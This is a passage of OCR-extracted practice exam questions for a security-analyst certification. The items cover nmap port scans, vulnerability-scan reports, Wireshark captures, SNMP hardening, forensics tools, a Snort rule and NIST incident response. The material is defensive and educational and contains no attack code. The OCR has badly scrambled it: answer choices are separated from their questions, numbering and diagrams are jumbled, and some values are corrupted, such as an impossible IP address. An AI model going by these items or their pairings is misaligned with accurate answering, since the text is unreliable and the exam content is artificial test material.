B. The presence of this vulnerability indicates a misconfiguration on the target server. 


C. The presence of this vulnerability indicates that the domain security policy may be 


lacking appropriate controls. 


D. The presence of this vulnerability indicates a critical flaw on the target server that must 


be addressed immediately. 


During an incident investigation, Chris discovers that attackers were able to query informa- 
tion about his routers and switches using SNMP. Chris finds that his routers used “public” 
and “private” as their community strings. Which of the following is not an appropriate 
action to take to help secure SNMP in Chris’s organization? 


A. Add complexity requirements to the SNMP community string. 
B. Enable and configure SNMP v2c. 


C. Enable and require TLS setting for SNMP. 
D. Apply different SNMP community strings to devices with different security levels. 


Heidi runs a vulnerability scan of the management interface of her organization’s virtual- 
ization platform and finds the severity 1 vulnerability shown here. What circumstance, if 
present, should increase the severity level of this vulnerability to Heidi? 


v 1 Remote Management Service Accepting Unencrypted Credentials Detected 
First Detected: 09/04/2015 at 18:04:22 (GMT-0400) Last Detected: 04/05/2017 at 00:05:04 (GMT-0400) 
QID: 45242 CVSS Baso: 4.3) 
Category: Information gathering CVSS Temporal: 3.3 
CVE ID: - CVSS3 Base: - 
Vendor Reference CVSS3 Temporal: 
Bugtraq ID: - CVSS Environment: 
Service Modified: 08/10/2016 Asset Group: 
User Modified: Collateral Damage Potential: 
Edited: No Target Distribution: 
PCI Vuln: Yes Confidentiality Requirement: 
Ticket State: Integrity Requirement: 


A. Lack of encryption 


B. Missing security patch 


Availability Requirement: 


Times Detected: 21 Last Fixed: 
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C. Exposure to external networks 


D. Out-of-date antivirus signatures 


Nancy ran a port scan against a network switch located on her organization’s internal net- 
work and discovered the results shown here. She ran the scan from her workstation on the 
employee VLAN. Which one of the following results should be of greatest concern to her? 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-09 13:07 EDT 
Nmap scan report for 10.1.0.121) 
Host is up (@.049s latency). 

Not shown: 966 closed ports 
PORT STATE 

22/tcp open 

23/tcp open 

80/tcp filtered 

443/tcp open 

631/tcp filtered 

8192/tcp filtered 

8193/tcp filtered 

8194/tcp filtered 

28201/tcp filtered 


Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds 
$ 


A. Port 22 
B. Port 23 
C. Port 80 
D. Ports 8192 to 8194 


Evan is troubleshooting a vulnerability scan issue on his network. He is conducting an 
external scan of a website located on the web server shown in the diagram. After checking 
the Apache httpd logs on the web server, he saw no sign of the scan requests. Which one of 
the following causes is the least likely issue for him to troubleshoot? 







Internet 


File Server 


DMZ 





Email Server Web Server 
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The scans are being blocked by an intrusion prevention system. 


The scans are being blocked by an Apache .htaccess file. 


OW > 


The scans are being blocked by a network firewall. 


D. The scans are being blocked by a host firewall. 


Sam is looking for evidence of software that was installed on a Windows 10 system. He 
believes that the programs were deleted and that the suspect used both registry and log 


cleaners to hide evidence. What Windows feature can’t he use to find evidence of the use of 


these programs? 

A. The MFT 

B. Volume shadow copies 

C. The shim (application compatibility) cache 
D. Prefetch files 


Patricia is evaluating the security of an application developed within her organization. She 


would like to assess the application’s security by supplying it with invalid inputs. What 
technique is Patricia planning to use? 


A. Fault injection 
B. Stress testing 

C. Mutation testing 
D. Fuzz testing 


A port scan conducted during a security assessment shows the following results. What type 


of device has most likely been scanned? 


Nmap scan report for EXAMPLE (192.168.1.79) 
Host is up (1.00s latency). 
Not shown: 992 closed ports 
PORT STATE 

21/tcp open 

23/tcp open 

80/tcp open 

280/tcp open 

443/tcp open 

515/tcp open 

631/tcp open 

9100/tcp open 


Nmap done: 1 IP address (1 host up) scanned in 124.20 seconds 


A. A wireless access point 
B. A server 

C. A printer 

D. A switch 
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9. Kim is reviewing the data gathered by the first responder to a security incident and comes 
across a text file containing the output shown here. What command generated this output? 


99m > 


10. Which of the following is not one of the major categories of security event indicators 


traceroute 
netstat 
ifconfig 


sockets 


Proto Recv-Q Send- 


tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 


49 


Q 
Q 
® 
® 
Q 
2 
® 
(4 


Local Address 


ip-172-30-0-60. 
ip-172-30-0-60. 
ip-172-30-0-60. 
ip-172-30-0-60. 
ip-172-30-0-60. 
ip-172-30-0-60. 
ip-172-30-0-60. 


described by NIST 800-61? 
Alerts from IDS, IPS, SIEM, AV, and other security systems 


Logs generated by systems, services, and applications 


A. 
B. 
C. 
D. 


11. During an nmap scan of a network, Charles receives the following response from nmap: 


Exploit developers 


Internal and external sources 


ec2. 
ec2. 
ec2. 
ec2. 
ec2. 
ec2. 
ec2. 


in:60694 
in:53350 
in:60692 
in: 38444 
inte:ssh 
in:53348 
int:http 


Foreign Address 
$3-1-w. amazonaws.com 
$3-1-w. amazonaws.com 
$3-1-w. amazonaws.com 
10.14.230.124:http 
10.14.230.147:53680 
$3-1-w. amazonaws.com 
engine16.uptimerobot 


State 
shttp TIME_WAIT 
shttp TIME_WAIT 
:http TIME_WAIT 
TIME_WAIT 
ESTABLISHED 
:http TIME_WAIT 
.:21330 TIME_WAIT 


Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-21 20:03 EDT 


Nmap done: 256 IP addresses (0 hosts up) scanned in 29.74 seconds 


What can Charles deduce about the network segment from these results? 


A. 
B. 
C. 
D 


12. Joe is designing a vulnerability management program for his company, a hosted service 
provider. He would like to check all relevant documents for customer requirements that 
may affect his scanning. Which one of the following documents is least likely to contain 
this information? 


A. 


B. 
C. 
D 


There are no active hosts in the network segment. 


All hosts on the network segment are firewalled. 


The scan was misconfigured. 


Charles cannot determine if there are hosts on the network segment from 


this scan. 


BPA 
SLA 


MOU 


BIA 
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13. During a port scan of a server, Gwen discovered that the following ports are open on the 
internal network: 


TCP port 25 
TCP port 80 
TCP port 110 
TCP port 443 
TCP port 1521 
TCP port 3389 


Of the services listed here, for which one does the scan not provide evidence that it is likely 
running on the server? 


A. Web 

B. Database 
C. SSH 

D. Email 


14. As part of her forensic analysis of a wiped thumb drive, Selah runs Scalpel to carve data 
from the image she created. After running Scalpel, she sees the following in the audit. Log 
file created by the program. What should Selah do next? 


sansforensics@siftworkstation:~/Downloads/scalpelout$ more audit.txt 
Scalpel version 1.60 audit file 

Started at Sun Apr 23 20:59:18 2017 

Command line: 

scalpel -v RHINOUSB.dd -o scalpelout 


Output directory: /home/sansforensics/Downloads/scalpelout 
Configuration file: /etc/scalpel/scalpel.conf 


Opening target "/home/sansforensics/Downloads/RHINOUSB.dd" 


The following files were carved: 


File Start Chop Length Extracte 

d From 

00000007. jpg 54481408 NO 230665 RHINOUSB 
.dd 

00000006. jpg 54473216 NO 6809 RHINOUSB 
.dd 

00000005. jpg 54206976 NO 264600 RHINOUSB 
.dd 

00000004. jpg 53793280 NO 411361 RHINOUSB 
00000003. jpg 53375488 NO 415534 RHINOUSB 
.dd 

00000002. jpg 53277184 NO 95814 RHINOUSB.dd 
00000001.gif 54727168 NO 4105 RHINOUSB.dd 
00000000. gif 54714880 NO 11407 RHINOUSB.dd 
00000008. jpg 171561472 NO 264600 RHINOUSB.dd 
00000010.doc 171528704 YES 10000000 RHINOUSB.dd 
00000009 .doc 171528704 NO 10000000 RHINOUSB.dd 


A. Runa data recovery program on the drive to retrieve the files. 


B. Run Scalpel in filename recovery mode to retrieve the actual filenames and directory 
structures of the files. 


C. Review the contents of the scalpelout folder. 


D. Use the identified file names to process the file using a full forensic suite. 


15. 


16. 


17. 


18. 
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As part of a government acquisitions program for the U.S. Department of Defense, Sean is 
required to ensure that the chips and other hardware-level components used in the switches, 
routers, and servers that he purchases do not include malware or other potential attack 
vectors. What type of supplier should Sean seek out? 


A. ATPM 

B. An OEM provider 

C. A trusted foundry 

D. A gray-market provider 

One of the servers that Adam is responsible for recently ran out of disk space. Despite 
system-level alarms, the problem was not detected, resulting in an outage when the server 


crashed. How would this issue be categorized if the NIST threat categorization method was 
used as part of an after-action review? 


A. Environmental 

B. Adversarial 

C. Accidental 

D. Structural 

Ben would like guidance on grouping information into varying levels of sensitivity. He 
plans to use these groupings to assist with decisions around the security controls that the 
organization will apply to storage devices containing that information. Which one of the 


following policies is most likely to contain relevant information for Ben’s decision-making 
process? 


A. Data retention policy 

B. Data classification policy 

C. Data encryption policy 

D. Data disposal policy 

Erin is attempting to collect network configuration information from a Windows system on 
her network. She is familiar with the Linux operating system and would use the ifconfig 


command to obtain the desired information on a Linux system. What equivalent command 
should she use in Windows? 


A. ipconfig 
B. netstat 
C. ifconfig 
D. netcfg 
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19. Lonnie ran a vulnerability scan of a server that he recently detected in his organization that 
is not listed in the organization’s configuration management database. One of the vulner- 
abilities detected is shown here. What type of service is most likely running on this server? 


v EEE 3 phpinfo Information Disclosure Vulnerability port 80/tcp CVSS: - CVSS3:- Active {qr} 
First Detected: 07/17/2016 at 12:02:41 (GMT-0400) Last Detected: 04/09/2017 at 17:39:08 (GMT-0400) Times Detected: 38 Last Fixed: NIA 
QID: 10464 CVSS Base: sW) 

Category: CGI CVSS Temporal: 3.8 
CVE ID: ° CVSS3 Base: - 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: - CVSS Environment: 

Service Modified: 06/21/2015 Asset Group: 

User Modified: e Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Integrity Requirement: 


Availability Requirement: 


THREAT: 

This host has a publicly-accessible PHP file that calis the phpinfo() function (or some other function similar to it). 

If a user requests this file (such as via an Internet browser), the user may obtain a page containing sensitive information about the Web server host. The information displayed to the user could include the exact version numbers of various software products (Operating Systems, 
Web Servers, PHP, XML, MySQL), the values of some environment variables (SPATH, SSYSTEM_ROOT), paths to various programs (cmd.exe), and much more. 

To get specific information about the type of data your host displayed, please refer to the “Result” field below. 


IMPACT: 
By exploiting this vulnerability, any user could obtain very sensitive information about the Web server host. This information may aid in attacks against the host. 


A. Database 

B. Web 

C. Time 

D. Network management 


20. Which CompIIA-defined phase of an incident response process includes scanning, validat- 
ing and updating permissions, and patching impacted machines? 


A. Eradication 
B. Validation 
C. Recovery 
D. Reporting 
21. Which NIST attack vector classification best describes a distributed denial-of-service 
attack? 
A. Impersonation 
B. Improper usage 
C. Web 
D. Attrition 
22. Taylor is preparing to run vulnerability scans of a web application server that his organiza- 
tion recently deployed for public access. He would like to understand what information 
is available to a potential external attacker about the system as well as what damage an 


attacker might be able to cause on the system. Which one of the following scan types would 
be least likely to provide this type of information? 


A. Internal network vulnerability scan 
B. Port scan 

C. Web application vulnerability scan 
D 


External network vulnerability scan 
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23. While analyzing a packet capture in Wireshark, Chris finds the packet shown here. Which 


24. 


of the following is he unable to determine from this packet? 


>Frame 1536: 69 bytes on wire (552 bits), 69 bytes captured (552 bits) 
Ethernet II, Src: Apple _cc:57:92 (00:03:93:cc:57:92), Dst: Oracle f0:13:96 (08:00:20: f0:13:96) 
>Destination: Oracle f0:13:96 (08:00:20: f0:13:96) 
>Source: Apple cc:57:92 (00:03:93:cc:57:92) 
Type: IP (0x0800) 
Internet Protocol Version 4, Src: 137.360.122.253 (137.30.122.253), Dst: 137.30.120.40 (137.30.120.40) 
Version: 4 
Header length: 20 bytes 
>Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport) ) 
Total Length: 55 
Identification: 0xd148 (53576) 
>Flags: 0x02 (Don't Fragment) 
Fragment offset: 0 
Time to live: 128 
Protocol: TCP (6) 
>Header checksum: 0x2416 [validation disabled] 
Source: 137.30.122.253 (137.30.122.253) 
Destination: 137.30.120.40 (137.30.120.40) 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
Transmission Control Protocol, Src Port: dec-mbadmin (1655), Dst Port: ftp (21), Seq: 13, Ack: 63, Len: 15 
Source port: dec-mbadmin (1655) 
Destination port: ftp (21) 
[Stream index: 69] 
Sequence number: 13 (relative sequence number) 
[Next sequence number: 28 (relative sequence number) ] 
Acknowledgment number: 63 (relative ack number) 
Header length: 20 bytes 
>Flags: 0x018 (PSH, ACK) 
Window size value: 64178 
[Calculated window size: 64178] 
[Window size scaling factor: -2 (no window scaling used) ] 
> Checksum: 0x058c [validation disabled] 
> [SEQ/ACK analysis] 
File Transfer Protocol (FTP) 
wPASS gnome123\r\n 
Request command: PASS 
Request arg: gnome123 





That the username used was gnome 

That the protocol used was FTP 

That the password was gnome123 

That the remote system was 137.30.120.40 


99 9 > 


Cynthia’s review of her network traffic focuses on the graph shown here. What occurred in 
late June? 


megabit/second 





2016-Jul 
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Beaconing 

High network bandwidth consumption 
A denial-of-service attack 

A link failure 


99 9 > 


25. Ron arrived at the office this morning to find a subpoena on his desk requesting electronic 
records in his control. What type of procedure should he consult to determine appropriate 
next steps, including the people he should consult and the technical process he should 
follow? 


A. Evidence production procedure 
B. Monitoring procedure 
C. Data classification procedure 
D. Patching procedure 
26. Ben is attempting to determine what services a Windows system is running and decides to 


use the netstat -at command to list TCP ports. He receives the output shown here. The 
system is most likely running which services? 


Active Connections 


Proto Local Address Foreign Address State Offload State 
TCP 0.0.0.0:80 example: LISTENING InHost 
TCP 0.0.0.0:135 example:@ LISTENING InHost 
TCP 0.0.0.0:445 example:0 LISTENING InHost 


A plain-text web server, Microsoft file sharing, and a secure web server 


SSH, email, and a plain-text web server 


OWD 


An email server, a plain-text web server, and Microsoft-DS 
D. A plain-text web server, Microsoft RPC, and Microsoft-DS 
27. Paul is researching models for implementing an IT help desk and would like to draw upon 


best practices in the industry. Which one of the following standard frameworks would pro- 
vide Paul with the best guidance? 


A. ISO 
B. ITIL 

C. COBIT 
D. PCI DSS 
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28. Which stage of the incident response process includes activities such as adding IPS signa- 
tures to detect new attacks? 


29. 


A. 
B. 
C. 
D. 


Detection and analysis 
Containment, eradication, and recovery 
Post-incident activity 


Preparation 


Mike is configuring vulnerability scans for a new web server in his organization. The server 
is located on the DMZ network, as shown here. What type of scans should Mike configure 
for best results? 


99 9 > 






Database 
Server 
(192.168.0.22) 





Internet 


\ J| File Server 
(192.168.0.16) 


DMZ 


Web Server 
(10.16.25.103/12.6.14.5) 
Mike should not scan servers located in the DMZ. 
Mike should perform only internal scans of the server. 
Mike should perform only external scans of the server. 


Mike should perform both internal and external scans of the server. 
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30. As part of her incident response process on a live Windows system, Alex reviews services 
using services.msc. What finding should Alex take away from her review of this based on 
the image shown here? 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


404@O 8 DRE LC LA E SELER: 


Source Destination Protocol Lengtt Info 
3 0.023433501 10.0.2.11 192.168.1.1 DNS 82 Standard query Ox4daa PTR 15.2.0.10.in-addr.arpa 
7 0.072131619 10.0.2.11 TAERE TCF 60 [SYN] Seq=0 Win=1024 Len=0 MSS=1460 





Services are running normally. 
The system is infected with malware. 


The system’s Windows antivirus software is disabled. 


99 9 > 


The system will not generate logs properly because Event Collector is set to Manual. 


31. Susan is building an incident response program and intends to implement NIST’s recom- 
mended actions to improve the effectiveness of incident analysis. Which of the following 
items is not a NIST-recommended incident analysis improvement? 


A. Perform behavioral baselining. 
B. Create and implement a logging policy. 
C. Set system BIOS clocks regularly. 


D. Maintain an organization-wide system configuration database. 


32. Jim’s nmap port scan of a system showed the following list of ports: 


PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
902/tcp open iss-realsecure 
912/tcp open apex-mesh 
3389/tcp open ms-wbt-server 


33. 


34. 


35. 


36. 
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What operating system is the remote system most likely running? 


A. Windows 

B. Linux 

C. An embedded OS 
D. macOS 


The Snort IPS that Adam has configured includes a rule that reads as follows: 
alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80 

(msg:"Alert!"; 

content:"http|3a|//www.example.com/download.php"; nocase; 
offset:12; classtype: web-application-activity;sid:5555555; rev:1;) 
What type of detection method is Adam using? 

A. Anomaly based 

B. Trend based 

C. Availability based 

D. Behavioral based 


Peter works for an organization that is joining a consortium of similar organizations that 
use a federated identity management system. He is configuring his identity management 
system to participate in the federation. Specifically, he wants to ensure that users at his 
organization will be able to use their credentials to access federated services. What role is 
Peter configuring? 


A. Relying party 

B. Service provider 

C. Identity provider 

D. Consumer 

Greg is seeking to protect his organization against attacks that involve the theft of user 


credentials. Which one of the following threats poses the greatest risk of credential theft in 
most organizations? 


A. DNS poisoning 

B. Phishing 

C. Telephone-based social engineering 

D. Shoulder surfing 

As part of her duties as an SOC analyst, Emily is tasked with monitoring intrusion detec- 
tion sensors that cover her employer’s corporate headquarters network. During her shift, 
Emily’s IDS reports that a network scan has occurred from a system with IP address 


10.0.11.19 on the organization’s unauthenticated guest wireless network aimed at systems 
on an external network. What should Emily’s first step be? 


A. Report the event to the impacted third parties. 

B. Report the event to law enforcement. 

C. Check the system’s MAC address against known assets. 
D. Check authentication logs to identify the logged-in user. 
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Which of the following commands is not useful for validating user permissions on a Linux 
system? 


A. more /etc/sudoers 


B. groups 
C. stat 
D. strings 


Tommy’s company recently implemented a new policy that restricts root access to its cloud 
computing service provider master account. This policy requires that a team member from 
the operations group retrieve a password from a password vault to log in to the account. 
The account then uses two-factor authentication that requires that a team member from the 
security group approve the login. What type of control is the company using? 


A. Separation of duties 

B. Privileged account monitoring 

C. Dual control 

D. Least privilege 

Tim works in an environment that is subject to the Payment Card Industry Data Security 
Standard. He realizes that technical constraints prevent the organization from meeting a 


specific PCI DSS requirement and want to implement a compensating control. Which one of 
the following statements is not true about proper compensating controls? 


A. The control must include a clear audit mechanism. 

B. The control must meet the intent and rigor of the original requirement. 

C. The control must provide a similar level of defense as the original requirement provides. 
D. The control must be above and beyond other requirements. 


Lou recently scanned a web server in his environment and received the vulnerability report 
shown here. What action can Lou take to address this vulnerability? 


v EE 2 SSL Certificate - Signature Verification Failed Vulnerability port 3389/tcp over SSL CVSS: - CVSS3: - Active ($v) 
First Detected: 05/11/2013 at 02:00:07 (GMT-0400) Last Detected: 04/04/2017 at 21:30:12 (GMT-0400) Times Detected: 160 Last Fixed: N/A 
QID: 38173 CVSS Base: 9.4 
Category: General remote services CVSS Temporal: 6.8 
CVE ID: - CVSS3 Base: á 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: - CVSS Environment: 

Service Modified: 05/22/2009 Asset Group: 

User Modified: = Collateral Damage Potential: 
Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 
Ticket State: Integrity Requirement: 


Availability Requirement: 


THREAT: 

An SSL Certificate associates an entity (person, organization, host, etc.) with a Public Key. In an SSL connection, the client authenticates the remote server using the server's Certificate and extracts the 
Public Key in the Certificate to establish the secure connection. The authentication is done by verifying that the public key in the certificate is signed by a trusted third-party Certificate Authority. 

If a client is unable to verify the certificate, it can abort communication or prompt the user to continue the communication without authentication. 


IMPACT: 

By exploiting this vulnerability, man-in-the-middle attacks in tandem with DNS cache poisoning can occur. 

Exception: 

If the server communicates only with a restricted set of clients who have the server certificate or the trusted CA certificate, then the server or CA certificate may not be available publicly, and the scan will be 
unable to verify the signature. 


41. 


42. 


43. 
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A. Configure TLS 

B. Replace the certificate 
C. Unblock port 443 

D. Block port 80 


Mike’s company recently suffered a security incident when they lost control of thousands of 
personal customer records. Many of these records were from projects that ended long ago 
and served no business purpose. What type of policy, if followed, would have best limited 
the impact of this incident? 


A. Data ownership policy 

B. Account management policy 

C. Acceptable use policy 

D. Data retention policy 

Which of the following factors is not typically considered when determining whether evi- 
dence should be retained? 

A. Media life span 

B. Likelihood of civil litigation 

C. Organizational retention policies 


D. Likelihood of criminal prosecution 


Match each of the following with the appropriate element of the CIA triad: 


A hard drive failure resulting in a service outage 


. A termination letter that is left on a printer and read by others in the department 


. Modification of an email’s content by a third party 


A. 1. Integrity, 2. confidentiality, 3. confidentiality 
B. 1. Integrity, 2. confidentiality, 3. availability 
C. 1. Availability, 2. availability, 3. confidentiality 
D. 1. Availability, 2. confidentiality, 3. integrity 
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44. Niesha discovered the vulnerability shown here on a server running in her organization. 
What would be the best way for Niesha to resolve this issue? 


99m > 


M 4 OpenSSH AES-GCM Cipher Remote Code Execution Vulnerability 


QID: 42420 
Category: General remote services 
CVE ID: CVE-2013-4548 
Vendor Reference: gcmrekey.adv 
Bugtraq ID: 63605 

Service Modified: 06/16/2015 
User Modified: - 

Edited: No 

PCI Vuln: Yes 

Ticket State 

THREAT. 


CECE) (ODON RD OR EAST TONNE ERENCE SEE AN HACIA I NOT 


A memory coruponvunraity in pos authentication exists when the Advanced Encryption Standard (AES)-Galois/Counter Mode of Operation 
(GCM) cipher is used for the key exchange. When an AES-GCM cipher is used, the mm_newkeys_from_blob() function in monitor_wrap.c does not 
properly initialize memory for a MAC context data structure, allowing remote authenticated users to bypass intended ForceCommand and login-shell 
restrictions via packet data that provides a crafted callback address. 

The new cipher was added only in OpenSSH 6.2, released on March 22, 2013. 

Affected Software: 

OpenSSH 6.2 and OpenSSH 6.3 when built against an OpenSSL that supports AES-GCM. 


IMPACT: 


A remote authenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the authenticated user and may 
therefore allow bypassing restricted shell/command configurations. 


SOLUTION: 
Update to OpenSSH 6.4 (http//www.openssh.com/txt/release-6.4) to remediate this vulnerability. 
Workaround: 
Aa workaround, customers may disable AES-GCM in the server configuration. The following sshd_config option will disable AES-GCM while leaving 
other ciphers active 
= aes128-ctr, aes192-ctr,aes256-ctr,aes128-cbc .3des-cbc, blowfish-cbc, cast! 28-cbc,aes 192-cbc,aes256-cbc 


>» Ca 
OpenSSH 6.4 (http/Avww.openssh.com/ixt/release-6.4) 


COMPLIANCE: 
Not Applicable 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


ASSOCIATED MALWARE: 
There is no malware information for this vulnerability. 


RESULTS: 
SSH-2.0-OpenSSH_6.2 detected on port 22 over TCP. 


Disable the use of AES-GCM. 
Upgrade OpenSSH. 
Upgrade the operating system. 


Update antivirus signatures. 
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45. As part of her post-incident recovery process, Alicia creates a separate virtual network as 


46. 


shown here to contain compromised systems she needs to investigate. What containment 


technique is she using? 


OW > 


D. 


Firewall 
Ruleset: 
Allow all from 
B,CtoA 

Deny all from 
Ato B and C 









= Data Center 


Business Office 







A 
Containment 
VLAN 






Segmentation 
Isolation 
Removal 


Reverse engineering 





Jennifer is reviewing her network monitoring configurations and sees the following chart 
for a system she runs remotely in Amazon’s Web Services environment more than 400 miles 
away. What can she use this data for? 
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Network Latency & Packet Loss PEORES 


AMI (AWS) 
Apr 21 2017, 12:30 pm- Apr 22 2017, 12:30 pm 


Zoom ih 12h 24h 


NOS 


200 ms 100 % 


100 ms 50% © 
% 
0 ms | | | Hl | | | | 0% 
6:00 PM 22 Apr 6:00 AM 12:00 PM 


IN MILLISECO 


O71 LIANO % 


RESPONSE TIME 





4 GB Response Time AMI (AWS) 
vi GB % Packet Loss AMI (AWS) 
solarwinds Y. 


Incident response; she needs to determine the issue causing the spikes in response time. 


The high packet loss must be investigated, as it may indicate a denial-of-service attack. 


She can use this data to determine a reasonable response time baseline. 


The high response time must be investigated, as it may indicate a denial-of-service attack. 


294 


47. 


48. 


49. 


50. 


Chapter 6 = Practice Exam 2 


The Windows system that Fred is conducting live forensics on shows a partition map, as shown 
here. If Fred believes that a hidden partition was deleted resulting in the unallocated space, which 
of the following tools is best suited to identifying the data found in the unallocated space? 


(C) 


893.71 GB NTFS 449 MB 
Healthy (System, Acti || Healthy (Boot, Page File, Crash Dump, Primary Partition) Unallocated 





A. Scalpel 
B. DBAN 
C. parted 
D. dd 


During a postmortem forensic analysis of a Windows system that was shut down after its 
user saw strange behavior, Ben concludes that the system he is reviewing was likely infected 
with a memory-resident malware package. What is his best means of finding the malware? 


A. Search for a core dump or hiberfil.sys to analyze. 

B. Review the INDX files and Windows registry for signs of infection. 

C. Boot the system and then use a tool like the Volatility Framework to capture live memory. 
D. Check volume shadow copies for historic information prior to the reboot. 

Randi’s organization recently suffered a cross-site scripting attack, and she plans to implement 


input validation to protect against the recurrence of such attacks in the future. Which one of 
the following HTML tags should be most carefully scrutinized when it appears in user input? 


A. <SCRIPT> 


B. <XSS> 
C. <B> 
D. <EM> 


Jessie needs to prevent port scans like the scan shown here. Which of the following is a 
valid method for preventing port scans? 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


4024@OM@HRO RELA r AEREE: 
LI 





Source Destination Protocol Lengtt Info 
3 0.023433501 10.0.2.11 192.168.1.1 82 Standard query Ox4daa PTR 15.2.0.10.in-addr.arpa 
7 0.072131619 10.0.2.11 0, 60 36410 — 1723 [SYN] Seq=0 Win=1024 Len=0 MSS=1460 


O [SYN] Seq=0 Win=1024 Len=0 MSS=1460 
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Not registering systems in DNS 
Using a firewall to restrict traffic to only ports required for business purposes 


Using a heuristic detection rule on an IPS 
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Implementing port security 


The IT services company that Ben works for uses the NIST functional impact categories 
to describe the impact of incidents. During a recent construction project, a contractor 
plugged a network device in twice to the same switch, resulting in a network loop and tak- 
ing down the organization’s network for a third of their users. How should Ben classify 
this event? 


A. Urgent 

B. Medium 
C. Important 
D. High 


What information can be gathered by observing the distinct default values of the following 
TCP/IP fields during reconnaissance activities: initial packet size, initial TTL, window size, 
maximum segment size, and flags? 


A. The target system’s TCP version 

B. The target system’s operating system 

C. The target system’s MAC address 

D. These fields are only useful for packet analysis. 

The collection of objects, the type of the objects, and how they relate to each other to create 
monitoring groups are all implemented as which of the following for SNMP? 

A. MBI 


B. MIB 
C. SMI 
D. OBJ 


Ben needs to identify the device or storage type that has the lowest order of volatility. 
Which of the following is the least volatile? 


A. Network traffic 

B. A solid state drive 

C. A spinning hard drive 
D. A DVD-ROM 
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55. Jerry recently completed a vulnerability scan of his organization’s data center and received 
the vulnerability report shown here from a server running in the data center. This server is 
running on a virtualization platform running on a bare-metal hypervisor. Where must Jerry 
correct this issue? 








v EEEH | 4 Microsoft Windows Kernel Elevation of Privileges (MS17-017) CVSS: - CVSS3:- New 
First Detected: 04/04/2017 at 21:52:03 (GMT-0400) Last Detected: 04/04/2017 at 21:52:03 (GMT-0400) Times Detected: 1 Last Fixed: N/A 
QID: 91346 CVSS Base: 7.2 
Category: Windows CVSS Temporal: 5.6 
CVE ID: CVE-2017-0050 CVE-2017-0101 CVE- CVSS3 Base: 7.8 

2017-0102 CVE-2017-0103 CVSS3 Temporal: 7 
Vendor Reference MS17-017 CVSS Environment: 
Bugtraq ID: 96025, 96625, 96627, 96623 Asset Group: 
Service Modified: 03/16/2017 Collateral Damage Potential: 
User Modified: - Target Distribution: 
Edited: No Confidentiality Requirement: 
PCI Vuln: Yes Integrity Requirement: 
Ticket State: Open Availability Requirement: 
THREAT: 


Multiple elevation of privilege vulnerabilities exists in the Microsoft Windows Kemel. 
The update addresses the vulnerabilities by correcting how Windows handles objects in memory, validates buffer lengths and inputs. 
Microsoft has rated this vulnerability as Important for all supported releases of Windows. 


IMPACT: 
A local attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system. 


SOLUTION: 

Customers are advised to refer to MS17-017 for more information. 
Patch: 

Following are links for downloading patches to fix the vulnerabilities: 
MS17-017: Windows Vista - 32 bit 

MS17-017: Windows Vista - 64 bit 

MS17-017: Windows Server 2008 

MS17-017: Windows 7 - Security only 

MS17-017: Windows 7 - Monthly rollup 

MS17-017: Windows Server 2008 R2 - Security only 
MS17-017: Windows Server 2008 R2 - Monthly rollup 
MS17-017: Windows 8.1 - Security only 

MS17-017: Windows 8.1 - Monthly rollup 

MS17-017: Windows 10 

MS17-017: Windows 10 Version 1511 

MS17-017: Windows 10 Version 1607 

MS17-017: Windows Server 2016 

MS17-017: Windows Server 2012 - Security only 
MS17-017: Windows Server 2012 - Monthly rollu 
MS17-017: Windows Server 2012 R2 - Security only 
MS17-017: Windows Server 2012 R2 - Monthly rollu 











A. Guest operating system 
B. Hypervisor 

C. Application 

D. 


Host operating system 


56. Dylan is an IT consultant brought in to assess the maturity of risk management practices at 
a firm using the NIST Cybersecurity Framework. During his evaluation, he determines that 
the organization does use an organization-wide approach to managing cybersecurity risk 
but that it does not use risk-informed policies, processes, and procedures to address poten- 
tial cybersecurity events. At what tier of the Cybersecurity Framework does this organiza- 
tion’s risk management program reside? 


A. Tier 1: Partial 

B. Tier 2: Risk Informed 
C. Tier 3: Repeatable 

D. Tier 4: Adaptive 
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57. After receiving complaints about a system on her network not performing correctly, Kath- 
leen decides to investigate the issue by capturing traffic with Wireshark. The captured traf- 


58. 


fic is shown here. What type of issue is Kathleen most likely seeing? 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


ABRAZO Wee 
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During a log review Lisa sees repeated firewall entries, as shown here: 


Time 
0.000268222 
. 935569169 
. 483849323 
. 483919052 
. 483935503 
. 483997037 
. 484021710 
. 484106918 
. 484148795 
. 484166768 
. 484362785 
. 484404374 
. 484420886 
. 484475319 
. 484556713 
. 484580255 
. 484636314 
. 484677632 
. 484729142 
. 484752320 
. 484804015 
. 484832250 
. 484898465 
. 484927363 
. 484942900 
. 485004562 
. 485023999 
. 485041155 
. 485058339 
. 485124928 
. 485149472 
. 485166197 
. 485222925 
. 485248954 
. 485313609 
. 485342005 
. 485357867 
. 485374225 
. 485468683 
- 485493736 


A link failure 

A failed three-way handshake 
A DDoS 

A SYN flood 


qooooooo0ocooo0o0ocooo°ocoooooooqceqo0ee0eo0ooooooo eo0oo0o0oo0o0o0o oe 0 0 


NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN N EY 


v» Destination 


qooooooo0oocooo°ocoo°cooooooo0o0oce0coceo0o0cooooo0ooq0 0o0o0o0oo0o°o°o°o & 


NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN LD 


D 


aise 
KA 


= - 


Protocol Lengtt Info 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
